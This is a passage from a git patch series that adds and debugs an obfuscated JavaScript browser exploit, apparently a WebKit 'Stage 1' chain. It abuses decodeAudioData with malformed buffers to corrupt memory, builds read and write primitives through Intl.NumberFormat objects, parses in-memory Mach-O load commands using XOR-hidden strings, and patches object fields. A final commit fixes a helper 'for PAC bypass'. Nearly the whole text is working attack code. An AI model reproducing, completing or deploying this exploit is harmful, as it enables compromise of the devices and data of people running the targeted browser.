(1313501509 ^ 1313505910), + Ce: 0 + }), i.push({ + ze: 2, + pe: (1145467467 ^ 1145471352), + Ce: 0 + }); + let e = 0; + for (const t of i) e += v.un(t.ze); + const o = Math.floor((1431263313 ^ 1431263565)); + let s = 0; + if (e < 0) s += -1 * e, s += o; + else { + if (s > o) throw new Error(""); + s += o - s + } + for (i.push({ + ze: s, + pe: 0, + Ce: 0 + }); 24 * i.length != (1161251638 ^ 1161251822);) i.push({ + ze: 0, + pe: 0, + Ce: 0 + }); + t.ce(i.length); + for (const n of i) t.ce(n.ze), t.ce(0), t.ce(0), t.ce(n.pe), t.ce(0), t.he(n.Ce), t.ce(0) + } + _e(t) { + t.ce((1365203545 ^ 1365203227)), t.ce((1450798932 ^ 1450798102)), t.ce((1331327860 ^ 1331331143)), t.ce((1514556777 ^ 1514584365)) + } + } + + function p(t, i, n) { + const r = new F(t); + if (i % 24 != 0) throw new Error(""); + if (n % 16 != 0) throw new Error(""); + const e = i / 24, + o = n / 16; + if (e >= o) throw new Error(""); + if (o >= (761620786 ^ 761599693)) throw new Error(""); + const s = []; + for (let t = 0; t < e - 1; t++) s.push({ + ze: 1 + }); + s.push({ + ze: o - e + }); + for (const t of s) t.pe = 0, t.xe = 1, t.Ce = l; + s[0].pe = 19; + const a = [{ + tag: f, + me: void 0, + ye: void 0 + }, { + tag: w, + me: void 0, + ye: void 0 + }, { + tag: u, + me: void 0, + ye: void 0 + }, { + tag: g, + me: void 0, + ye: void 0 + }, { + tag: d, + me: void 0, + ye: void 0 + }, { + tag: b, + me: void 0, + ye: void 0 + }], + c = 16 + 12 * a.length; + r.ue(c); + for (const t of a) { + const i = r.be(); + switch (t.me = i, t.tag) { + case f: { + const t = { + Ue: 0, + Ee: 0, + ke: B, + ve: 0, + Fe: 0, + Ne: 0, + Se: 0 + }; + r.he(t.Ue), r.he(t.Ee), r.ce(t.ke), r.ce(t.ve), r.ce(t.Fe), r.ce(t.Ne), r.ce(t.Se); + break + } + case w: { + const t = [ + [([12, 33, 37, 32, 33, 54, 23, 33, 33, 32].map(x => { + return String.fromCharCode(x ^ 68); + }).join("")), "0"], + [([8, 35, 46, 63, 52, 61, 57, 40, 41, 15, 33, 34, 46, 38, 62].map(x => { + return String.fromCharCode(x ^ 77); + }).join("")), "0"], + [([47, 2, 6, 3, 2, 21, 44, 2, 30].map(x => { + return String.fromCharCode(x ^ 103); + }).join("")), ([81, 65, 81, 65, 81, 65, 81].map(x => { + return String.fromCharCode(x ^ 97); + }).join(""))], + [([0, 19, 22, 23, 58, 51, 38].map(x => { + return String.fromCharCode(x ^ 67); + }).join("")), "0"] + ]; + r.ce(t.length); + for (const [i, n] of t) r.fe(0), r.ce(i.length), r.ce(n.length), r.we(i), r.we(n); + break + } + case u: + r.he(0), r.le("\0", 16), r.le("\0", 40), r.ce(19), r.ce(0), r.ce(0), r.ce(0); + break; + case g: + r.ce(0); + break; + case d: { + const t = -1; + r.ce(s.length); + for (const i of s) r.ce(i.ze), r.ce(t), r.ce(t), r.ce(i.pe), r.ce(i.xe), r.he(i.Ce), r.ce(0); + break + } + case b: { + r.ce(19); + const t = r.be() + 4; + r.ce(t), r.le("\0", 19); + let i = r.be() + 8; + for (let t = 0; t < o; t++) r.ce(0), r.ce(i), i += 8; + break + } + } + t.ye = r.be() - i + } + const h = r.be(); + r.ue(0), r.ce(h), r.ce(B), r.ce(a.length), r.ce(0); + for (const t of a) r.ce(t.tag), r.ce(t.me), r.ce(t.ye); + return r.Be().buffer.slice(0, h) + } + window.log(`[Stage 1] All helper functions/classes defined, entering main async`); + return await async function () { + window.log(`[Stage 1] Main async starting, attempting h(e, s)`); + const e = []; + let s = 0, + a = 0, + c = null; + for (a = 0; a < 12; a++) { + try { + window.log(`[Stage 1] Attempt ${a + 1}/12 to call h(e, s) with s=${s}`); + c = await h(e, s); + window.log(`[Stage 1] h(e, s) succeeded!`); + break + } catch (t) { + window.log(`[Stage 1] h(e, s) failed: ${t.message}, s was ${s}, new s = e.length = ${e.length}`); + s = e.length + } + } + if (null === c) throw new Error(""); + const l = await async function (e) { + const o = new ArrayBuffer((1933993560 ^ 1933977176)), + s = new ArrayBuffer((1467382354 ^ 1467365970)), + a = p(o, (1767200610 ^ 1767201826), (1396920442 ^ 1396929658)); + class c { + async init() { + const t = e.qi + I, + i = t + m, + o = t + E, + c = e.qi + _, + h = async (t, i) => { + { + const n = S(s, new A(t, [i, 0])); + let o = 0; + const c = e.Xi.format(1 / 0); + do { + if (o += 1, o > 20) throw Error(0); + for (let t = 0; t < 12; t++) await r.decodeAudioData(a); + try { + await r.decodeAudioData(n) + } catch (t) { } + } while (c === e.Xi.format(1 / 0)) + } + }; + await h(i, (893998410 ^ 893998664)), await h(o, Number(c & BigInt(([7, 79, 113, 113, 113, 113, 113, 113, 113, 113].map(x => { + return String.fromCharCode(x ^ 55); + }).join(""))))), await h(o + BigInt(4), Number(c >> BigInt(32))); + { + const t = e.Xi.format(1 / 0), + i = (E - U) / BigInt(2); + let n = BigInt(0); + for (let r = 3; r >= 0; r--) n = n << BigInt(16) | BigInt(t.charCodeAt(Number(i) + r)) + } + await h(i, (844327525 ^ 844328557)); + const l = e.Xi.format(1 / 0); + this.Pe = n(this.Me(l, 0)) + } + constructor() { + this.Oe = !1, this.We = null, this.De = null, this.Ve = null, this.Pe = null, this.$e = new Uint16Array(new ArrayBuffer(32)), this.He = new DataView(this.$e.buffer) + } + hr(t = (862091577 ^ 862091833)) { + for (let i = 0; i < Math.min(t, Number(this.De)); i += 8); + } + je(t, i) { + if (i = BigInt(i), null === this.We) throw new Error(""); + if (null === this.De) throw new Error(""); + if (null === this.Ve) throw new Error(""); + const n = t + i; + if (n < this.We) throw new Error(""); + if (n >= this.We + this.De) throw new Error("") + } + Ke() { + this.Ve = e.Xi.format(NaN) + } + br(t) { + if ((t = Number(t)) % 2 != 0) throw new Error(""); + this.je(this.We, t), t /= 2; + for (let i = 0; i < 2; i++) { + const n = this.Ve.charCodeAt(t + i); + if (Number.isNaN(n)) throw new Error(""); + this.$e[i] = n + } + return this.He.getUint32(0, !0) + } + Er(t = 0, i = (1632710982 ^ 1632711342)) { + t = Number(t), this.je(this.We, t); + let n = "", + r = 0, + e = t % 2 != 0; + for (; ;) { + const o = this.Ve.charCodeAt(Math.floor((t + r) / 2)), + s = (2037075298 ^ 2037075357) & o, + a = o >>> 8; + if (!1 === e) { + if (0 === s) break; + if (n += String.fromCharCode(s), r += 1, r >= i) break + } + if (e = !1, 0 === a) break; + if (n += String.fromCharCode(a), r += 1, r >= i) break + } + return n + } + Ki(t) { + if ((t = Number(t)) % 2 != 0) throw new Error(""); + this.je(this.We, t), t /= 2; + for (let i = 0; i < 4; i++) { + const n = this.Ve.charCodeAt(t + i); + if (Number.isNaN(n)) throw new Error(""); + this.$e[i] = n + } + return this.He.getBigUint64(0, !0) + } + Me(t, i) { + if ((i = Number(i)) % 2 != 0) throw new Error(""); + i /= 2; + for (let n = 0; n < 4; n++) { + const r = t.charCodeAt(i + n); + if (Number.isNaN(r)) throw new Error(""); + this.$e[n] = r + } + return this.He.getBigUint64(0, !0) + } + async Je(t, i = null) { + const n = e.qi + _, + o = n + m, + c = n + y, + h = n + E; + let l = 0, + f = null, + w = null, + u = null; + if (!1 === this.Oe || null !== i) { + let t = (928141942 ^ 928141430); + if (null !== i && (t = Number(i)), BigInt(t) !== this.De) { + this.De = BigInt(t); + const i = t > (1198089544 ^ 1198090056); + let n = 8 | t << 5; + !0 === i && (n = (1416312649 ^ 1416353601)), u = S(s, new A(o, [n, 0])), l = 0, f = e.Xi.format(1 / 0); + do { + if (l += 1, l > 20) throw Error(0); + for (let t = 0; t < 12; t++) await r.decodeAudioData(a); + try { + await r.decodeAudioData(u) + } catch (t) { } + } while (f === e.Xi.format(1 / 0)); + if (w = this.Me(e.Xi.format(1 / 0), Number(m)), w !== BigInt(n)) throw new Error(""); + if (!0 === i) { + u = S(s, new A(c, [t, 0])), l = 0, f = e.Xi.format(1 / 0); + do { + if (l += 1, l > 20) throw Error(0); + for (let t = 0; t < 12; t++) await r.decodeAudioData(a); + try { + await r.decodeAudioData(u) + } catch (t) { } + } while (f === e.Xi.format(1 / 0)); + if (w = this.Me(e.Xi.format(1 / 0), Number(y)), w !== BigInt(t)) throw new Error("") + } + } + } + u = S(s, new A(h, [Number(t & BigInt(([70, 14, 48, 48, 48, 48, 48, 48, 48, 48].map(x => { + return String.fromCharCode(x ^ 118); + }).join("")))), 0])), l = 0, f = e.Xi.format(1 / 0); + do { + if (l += 1, l > 40) throw Error(0); + for (let t = 0; t < 12; t++) await r.decodeAudioData(a); + try { + await r.decodeAudioData(u) + } catch (t) { } + } while (f === e.Xi.format(1 / 0)); + u = S(s, new A(h + BigInt(4), [Number(t >> BigInt(32)), 0])), l = 0, f = e.Xi.format(1 / 0); + do { + if (l += 1, l > 40) throw Error(0); + for (let t = 0; t < 12; t++) await r.decodeAudioData(a); + try { + await r.decodeAudioData(u) + } catch (t) { } + } while (f === e.Xi.format(1 / 0)); + if (w = this.Me(e.Xi.format(1 / 0), Number(E)), w !== t) throw new Error(""); + this.We = t, this.Ve = e.Xi.format(NaN), this.Oe = !0 + } + } + const h = new c; + await h.init(); + const l = h.Pe; + await h.Je(l), n(h.Ki(0)); + const f = n(h.Ki(0)); + let w = f - f % BigInt((1816809016 ^ 1816153656)); + const u = BigInt((1802265673 ^ 1801872457)); + await h.Je(w, u); + let g = null; + for (; null === g;) { + for (let t = BigInt(0); t < u; t += BigInt((1313814892 ^ 1313810796)))(4294967296 + (1969632586 ^ -1953771643)) === h.br(t) && (g = w + t); + null === g && (w -= u, await h.Je(w)) + } + const d = 4, + b = 40, + B = 8, + k = 24, + v = 32; + await h.Je(g, BigInt((1983990839 ^ 1983974455))); + let F = null, + N = null; + const T = h.br(16); + (() => { + let t = v; + for (let i = 0; i < T; i++) { + const i = h.br(t), + n = h.br(t + d); + if (25 === i && ([106, 106, 97, 112, 109, 97].map(x => { + return String.fromCharCode(x ^ 53); + }).join("")) === h.Er(t + B)) { + const i = h.Ki(t + k), + n = h.Ki(t + b); + return F = g - i, void (N = g - n) + } + t += n + } + throw new Error("") + })(), await h.Je(N, BigInt((1164271428 ^ 1164267332))); + const C = h.br((1314289713 ^ 1314290161)), + x = h.br((2003720249 ^ 2003720701)), + P = N + BigInt(C); + await h.Je(P, BigInt(32 * x)); + const O = []; + let W = (846344769 ^ 1032703422), + D = 0; + for (let t = 0; t < x; t++) { + const i = 32 * t, + n = h.br(i + 24); + W = Math.min(n, W), D = Math.max(n, D), O.push({ + Le: h.Ki(i) + F, + Re: n + }) + } + await h.Je(N + BigInt(W), BigInt(D - W) + BigInt((1095519607 ^ 1095519323))); + const V = (() => { + for (const { + Le: t, + Re: i + } + of O) + if (([98, 56, 62, 63, 98, 33, 36, 47, 98, 62, 52, 62, 57, 40, 32, 98, 33, 36, 47, 62, 52, 62, 57, 40, 32, 18, 61, 57, 37, 63, 40, 44, 41, 99, 41, 52, 33, 36, 47].map(x => { + return String.fromCharCode(x ^ 77); + }).join("")) === h.Er(i - W)) return t; + throw new Error("") + })(), + $ = async t => { + let i = !1, + n = null, + r = null, + e = null, + o = null; + const s = {}; + let a = null; + await h.Je(t, BigInt((1882473569 ^ 1882477665))); + const c = h.br(16); + let l = v; + for (let e = 0; e < c; e++) { + const e = h.br(l), + c = h.br(l + d); + switch (e) { + case 25: { + const i = { + Xe: h.Er(l + B, 16), + qe: h.Ki(l + k), + Ge: null, + Qe: h.Ki(l + b) + }; + switch (i.Xe) { + case ([55, 55, 60, 45, 48, 60].map(x => { + return String.fromCharCode(x ^ 104); + }).join("")): + o = t - i.qe; + break; + case ([110, 110, 125, 120, 127, 122, 116, 117, 120, 101].map(x => { + return String.fromCharCode(x ^ 49); + }).join("")): + a = i.qe + o - i.Qe + } + if (void 0 !== s[i.Xe]) throw new Error(""); + s[i.Xe] = i; + break + } + case (4294967296 + (1316571241 ^ -830912437)): + i = !0, n = h.br(l + 40), r = h.br(l + 44); + break; + case (4294967296 + (1380348984 ^ -767134709)): + i = !0, n = h.br(l + 8), r = h.br(l + 12) + } + l += c + } + for (const t of Object.keys(s)) { + const i = s[t]; + i.Ge = i.qe + o + } + if (!1 === i) throw new Error(""); + e = a + BigInt(n); + const f = new ArrayBuffer(r); + await h.Je(e, r); + const w = new Uint32Array(f); + for (let t = 0; t < w.length; t++) w[t] = h.br(4 * t); + const u = new Uint8Array(f), + g = t => { + const i = u; + let n = "", + r = 0, + e = !1; + for (; !e;) { + e = !0; + let o = 0, + s = 0; + do { + o += ((1313960505 ^ 1313960518) & i[r]) << s, s += 7 + } while ((1098134344 ^ 1098134472) & i[r++]); + if (n === t && 0 !== o) { + r++; + let t = 0; + s = 0; + do { + t += ((1850494570 ^ 1850494485) & i[r]) << s, s += 7 + } while ((1396272182 ^ 1396272310) & i[r++]); + return t + } + r += o; + const a = i[r++]; + for (let o = 0; o < a; o++) { + let o = ""; + for (; 0 !== i[r];) o += String.fromCharCode(i[r++]); + r++; + let a = 0; + s = 0; + do { + a += ((1181446996 ^ 1181446955) & i[r]) << s, s += 7 + } while ((1885751632 ^ 1885751760) & i[r++]); + if (o.length && n + o === t.substr(0, n.length + o.length)) { + n += o, r = a, e = !1; + break + } + } + } + return null + }, + I = i => { + const n = g(([23].map(x => { + return String.fromCharCode(x ^ 72) + }).join("")) + (i)); + if (null === n) throw new Error(""); + return t + BigInt(n) + }; + return { + Ye: g, + Ze: I + } + }, H = (await $(V)).Ze(([56, 60, 32, 58, 45, 41, 44, 23, 37, 41, 33, 38, 23, 60, 32, 58, 45, 41, 44, 23, 38, 56].map(x => { + return String.fromCharCode(x ^ 72); + }).join(""))), j = BigInt(64); + await h.Je(H, j); + const K = new Uint32Array(Number(j) / 4); + for (let t = 0; t < K.length; t += 1) K[t] = h.br(4 * t); + let J = null, + L = null; + for (const t in K) { + const i = K[t]; + if (-(1463055181 ^ 657748813) == ((4294967296 + (1515861862 ^ -983943322)) & i)) { + const t = ((1127823425 ^ 1137100705) & i) >> 5 << 14 | ((1599034724 ^ 1062163812) & i) >> 29 << 12; + J = H - H % BigInt((1484342131 ^ 1484346227)) + BigInt(t) + } else if (-(1700999479 ^ 1671639351) == ((4294967296 + (875714420 ^ -873310348)) & i)) { + L = J + BigInt(8 * (i >> 10 & (1294812501 ^ 1294813866))); + break + } + } + if (null === L) throw new Error(""); + await h.Je(L, BigInt((1330473825 ^ 1330473569))); + const R = h.Ki(0), + X = BigInt((1633316206 ^ 1633316318)), + q = BigInt((1969453647 ^ 1969453815)), + G = BigInt(16), + Q = []; + let Y = R; + do { + await h.Je(Y); + const t = h.Ki(X); + t - h.Ki(q) >= BigInt((1951421032 ^ 1951461992)) && Q.push({ + io: Y, + no: t + }), Y = h.Ki(G) + } while (Y !== BigInt(0)); + const Z = async t => { + const i = [(1733258864 ^ 1732917826), (1919894851 ^ 1919492208), t, (1718899798 ^ 1719039842), (812336994 ^ 811783510)]; + let n = null; + const r = (t, ...e) => { + try { + r(t + 1, ...i, ...e) + } catch (t) { + h.Ke(); + for (let t = 0; t < (1681351477 ^ 1681355573); t += 8) + if (h.Ki(t) === BigInt(([1, 73, 87, 87, 87, 84, 1, 1, 1, 1, 1, 1, 1, 4, 4, 5, 2, 3].map(x => { + return String.fromCharCode(x ^ 49); + }).join(""))) && h.Ki(t + 8) === BigInt(([87, 31, 1, 1, 1, 2, 87, 87, 87, 87, 87, 87, 87, 81, 81, 82, 84, 84].map(x => { + return String.fromCharCode(x ^ 103); + }).join(""))) && h.Ki(t + 24) === BigInt(([6, 78, 80, 80, 80, 83, 6, 6, 6, 6, 6, 6, 6, 4, 4, 5, 5, 2].map(x => { + return String.fromCharCode(x ^ 54); + }).join(""))) && h.Ki(t + 32) === BigInt(([101, 45, 51, 51, 51, 48, 101, 101, 101, 101, 101, 101, 101, 108, 108, 103, 102, 97].map(x => { + return String.fromCharCode(x ^ 85); + }).join("")))) return void (n = h.Ki(t + 16)) + } + }; + for (const t in Q) { + const e = Q[t].no - BigInt((1752708705 ^ 1752725089)); + if (await h.Je(e, BigInt((1278297418 ^ 1278301514))), r(0, ...i), null !== n) break + } + if (null === n) throw new Error(""); + return n + }, tt = new Array((812536690 ^ 812536762)); + tt.fill(null); + const it = await Z(tt); + await h.Je(it, BigInt(96)); + const nt = h.Ki(8); + await h.Je(nt), tt.fill((1162883439 ^ 1162883348)); + const rt = async (t, i) => { + const n = Number((i >> BigInt(32)).toString()), + e = Number((i & BigInt((4294967296 + (1831691832 ^ -1831691833)))).toString()), + o = S(s, new A(t, [e, 0])); + for (let t = 0; t < 12; t++) r.decodeAudioData(a); + try { + await r.decodeAudioData(o) + } catch (t) { } + const c = S(s, new A(t + BigInt(4), [n, 0])); + for (let t = 0; t < 12; t++) r.decodeAudioData(a); + try { + await r.decodeAudioData(c) + } catch (t) { } + }, et = [document.createElementNS(([37, 57, 57, 61, 119, 98, 98, 58, 58, 58, 99, 58, 126, 99, 34, 63, 42, 98, 127, 125, 125, 125, 98, 62, 59, 42].map(x => { + return String.fromCharCode(x ^ 77); + }).join("")), ([95, 92, 122, 86, 87, 79, 86, 85, 79, 92, 116, 88, 77, 75, 80, 65].map(x => { + return String.fromCharCode(x ^ 57); + }).join(""))), document.createElementNS(([81, 77, 77, 73, 3, 22, 22, 78, 78, 78, 23, 78, 10, 23, 86, 75, 94, 22, 11, 9, 9, 9, 22, 74, 79, 94].map(x => { + return String.fromCharCode(x ^ 57); + }).join("")), ([41, 42, 12, 32, 33, 57, 32, 35, 57, 42, 2, 46, 59, 61, 38, 55].map(x => { + return String.fromCharCode(x ^ 79); + }).join(""))), document.createElementNS(([15, 19, 19, 23, 93, 72, 72, 16, 16, 16, 73, 16, 84, 73, 8, 21, 0, 72, 85, 87, 87, 87, 72, 20, 17, 0].map(x => { + return String.fromCharCode(x ^ 103); + }).join("")), ([55, 52, 18, 62, 63, 39, 62, 61, 39, 52, 28, 48, 37, 35, 56, 41].map(x => { + return String.fromCharCode(x ^ 81); + }).join("")))], ot = et[0].orderX, st = et[1].orderX, at = et[2].orderX, ct = JSON.parse(([48, 90, 69, 90, 71, 75, 48, 54, 54].map(x => { + return String.fromCharCode(x ^ 107); + }).join(""))); + tt[0] = ot, tt[1] = st, tt[2] = at, tt[3] = ct, tt[4] = (1496929129 ^ 1508376139), await h.Je(nt); + const ht = h.Ki(0), + lt = h.Ki(8), + ft = h.Ki(16), + wt = h.Ki(24), + ut = { + ro: [], + eo: [], + oo: [] + }; + await h.Je(lt); + const gt = h.Ki(24); + await h.Je(gt), ut.eo.push([BigInt(40), h.Ki(40)]), ut.eo.push([BigInt(48), h.Ki(48)]); + do { + await rt(gt + BigInt(16), BigInt(0)), await rt(gt + BigInt(24), BigInt(0)), h.Ke() + } while (h.Ki(16) !== BigInt(0) || h.Ki(24) !== BigInt(0)); + await h.Je(ht); + const dt = h.Ki(24); + await h.Je(dt), ut.ro.push([BigInt(40), h.Ki(40)]), ut.ro.push([BigInt(48), h.Ki(48)]); + do { + await rt(dt + BigInt(16), BigInt(0)), await rt(dt + BigInt(24), BigInt(0)), h.Ke() + } while (h.Ki(16) !== BigInt(0) || h.Ki(24) !== BigInt(0)); + await h.Je(ft); + const bt = h.Ki(24); + await h.Je(bt), ut.oo.push([BigInt(40), h.Ki(40)]), ut.oo.push([BigInt(48), h.Ki(48)]); + do { + await rt(bt + BigInt(16), BigInt(0)), await rt(bt + BigInt(24), BigInt(0)), h.Ke() + } while (h.Ki(16) !== BigInt(0) || h.Ki(24) !== BigInt(0)); + await h.Je(dt); + do { + await rt(dt + BigInt(32), bt + BigInt(32) - BigInt(28)), h.Ke() + } while (h.Ki(32) !== bt + BigInt(32) - BigInt(28)); + await h.Je(gt); + do { + await rt(gt + BigInt(32), bt + BigInt(32) - BigInt(28) + BigInt(4)), h.Ke() + } while (h.Ki(32) !== bt + BigInt(32) - BigInt(28) + BigInt(4)); + window.log(`[Stage 1] Creating M instance with corrupted Intl.NumberFormat objects`); + const Bt = new M(dt, ot, gt, st, bt, at, wt, ct); + for (const t of [ + [gt, ut.eo], + [dt, ut.ro], + [bt, ut.oo] + ]) { + const i = t[0], + n = t[1]; + for (const t of n) { + const n = t[0], + r = t[1]; + Bt.Hi(i + BigInt(n), r) + } + } + window.log(`[Stage 1] Patching et Intl.NumberFormat objects`); + for (const t in et) { + const i = et[t], + r = Bt.tA(i), + e = n(Bt.Ki(r + BigInt(24))), + o = Bt.br(e + BigInt(24)); + Bt.dr(e + BigInt(24), o + (1733968200 ^ 1733951816)) + } + window.log(`[Stage 1] Patching It ArrayBuffer objects`); + const It = [ot, st, at]; + for (const t in It) { + const i = It[t], + r = Bt.tA(i), + e = n(Bt.Ki(r + BigInt(24))), + o = Bt.br(e + BigInt(8)); + Bt.dr(e + BigInt(8), o + (1361928816 ^ 1361912432)) + } + window.log(`[Stage 1] All patches applied, creating z wrapper instance`); + return i.Ji = N, i.Li = F, window.log(`[Stage 1] Exploit IIFE returning z instance`), new z(t, Bt) + }(c); + for (const t of e) { + if (null === t) continue; + const i = l.tr(t); + l.dr(i + 24, 0), l.dr(i + 28, 0), l.dr(i + 32, 0), l.dr(i + 36, 0) + } + for (const t in o) { + const i = o[t], + n = l.tr(i), + r = l.Dr(n + 24), + e = l.br(r + 0); + l.dr(r + 0, e + (1129085514 ^ 1129069130)) + } + return window.log(`[Stage 1] Cleanup done, returning exploit primitive l`), o.length = 0, e.length = 0, l + }() + }(); + window.log(`[Stage 1] Exploit succeeded, assigning to P.zn.exploitPrimitive`); + P.zn.exploitPrimitive = i + } catch (t) { + window.log(`[Stage 1] Exploit failed with error: ${t.name}: ${t.message}`); + throw P.zn.exploitPrimitive = void 0, t + } +}, r; \ No newline at end of file From aed129e0630f79ccfdb04d0a49954f81ca50ac3d Mon Sep 17 00:00:00 2001 From: ghh-jb Date: Tue, 7 Apr 2026 08:00:14 +0300 Subject: [PATCH 5/5] undefined is not a function error in rshift. Fix for PAC bypass breezy15. --- utility_module.js | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) mode change 100644 => 100755 utility_module.js diff --git a/utility_module.js b/utility_module.js old mode 100644 new mode 100755 index 14d9a46..2e9d237 --- a/utility_module.js +++ b/utility_module.js @@ -263,7 +263,9 @@ let m_57620206d62079baad0e57e6d9ec93120c0f5247 = () => { */ class Int64 { // Wrapper for compatibility with obfuscated modules - static ut(t) {return Int64.fromNumber(t);} + static ut(t) { + return Int64.fromNumber(t); + } static ot(t) {return Int64.fromBigInt(t);} static st(t) {return Int64.fromUnsigned(t);} static L(t) {return Int64.fromDouble(t);} @@ -387,6 +389,11 @@ let m_57620206d62079baad0e57e6d9ec93120c0f5247 = () => { return new Int64(this.it >>> t | this.et << 32 - t, this.et >>> t); } + /** Logical right shift (alias for dt). */ + rshift(t) { + return this.dt(t); + } + toString() { return ""; } @@ -737,9 +744,9 @@ let m_57620206d62079baad0e57e6d9ec93120c0f5247 = () => { r.Xt = r.encodeLEB128 = function encodeLEB128(arr, n, value) { var byte; for (;;) { - byte = value.lo % 128; // 1466329413 ^ 1466329541 + byte = value.it % 128; // 1466329413 ^ 1466329541 value = value.sub(Int64.fromInt32(byte)); - if (0 === value.hi && 0 === value.lo) { + if (0 === value.et && 0 === value.it) { // Last byte: no continuation bit } else {byte |= 128; // 1416853561 ^ 1416853689 (continuation)